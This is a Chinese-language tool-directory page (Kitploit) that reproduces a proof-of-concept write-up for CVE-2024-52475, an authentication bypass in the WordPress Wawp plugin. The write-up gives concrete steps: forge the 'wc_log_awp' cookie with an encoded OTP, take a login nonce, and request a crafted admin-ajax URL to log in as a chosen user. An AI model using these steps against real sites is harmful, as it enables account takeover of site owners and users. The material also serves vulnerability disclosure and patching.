Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-52475 — WordPress 插件(Wawp Plugin < 3.0.18)中的身份认证失效 | Kitploit
工具/GitHubGitHub/ubaydev/cve-2024-52475
漏洞分析Web应用程序漏洞利用渗透测试身份验证学习与教育
GitHububaydev/cve-2024-52475

CVE-2024-52475

WordPress 插件(Wawp Plugin < 3.0.18)中的身份认证失效

查看仓库
111年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

(CVE-2024-52475) WordPress Wawp 插件 <= 3.0.17 存在认证绕过漏洞(账户接管)

免责声明!

本文档中提供的有关 CVE-2024-52475 的信息仅供学习和教育目的使用。我们不鼓励也不授权将本信息用于任何有害目的,包括但不限于漏洞利用、系统篡改或其他非法活动。

我们强调在探索和理解安全漏洞时必须遵循道德规范。请记住,使用这些信息时应保持负责任的态度,并遵守适用法律。因使用此信息而采取的任何行动均由用户自行承担全部责任。

使用本材料即表示您同意不滥用所提供的信息,并对因使用此类信息而可能产生的任何后果承担全部责任。

简介

在浏览了与该 CVE 相关的一些资料和代码后,我发现在 Wawp 插件 3.0.17 及以上版本的 class-login.php 文件中存在一些异常和缺陷。缺陷位于第 252 至 257 行,代码在此处解码来自 cookie 'wc_log_awp' 的 OTP。这使得某些不负责任的人可以通过 DevTools 或其他方式手动设置该 cookie。 1.jpg

测试

  1. 通过 DevTools 手动设置 cookie 'wc_log_awp',其值为 'VFZSSmVrMVVUWGc9',解码后为:(123131)
  2. 在首页/登录页面找到登录 nonce 1.jpg 或 1.jpg
  3. 然后直接访问此 URL
    root@kitploit:~
    http://wordpress.test/wp-admin/admin-ajax.php?action=awp_login&nonce=LOGIN_NONCE&code=123131&user=USER_ID
    
  4. 如果响应如下所示,则漏洞利用成功 1.jpg
  5. 在 DevTools 中检查 admin cookie,然后前往 /wp-admin 1.jpg

请我喝杯咖啡:

  • saweria.co
  • buymeacoffee.com
  • trakteer.id

参考:

https://patchstack.com/database/vulnerability/automation-web-platform/wordpress-wawp-plugin-3-0-18-account-takeover-vulnerability

致谢:

真主、穆罕默德(愿主福安之)、stealthcopter、Markdown Monster、我的家人,还有你?

下载工具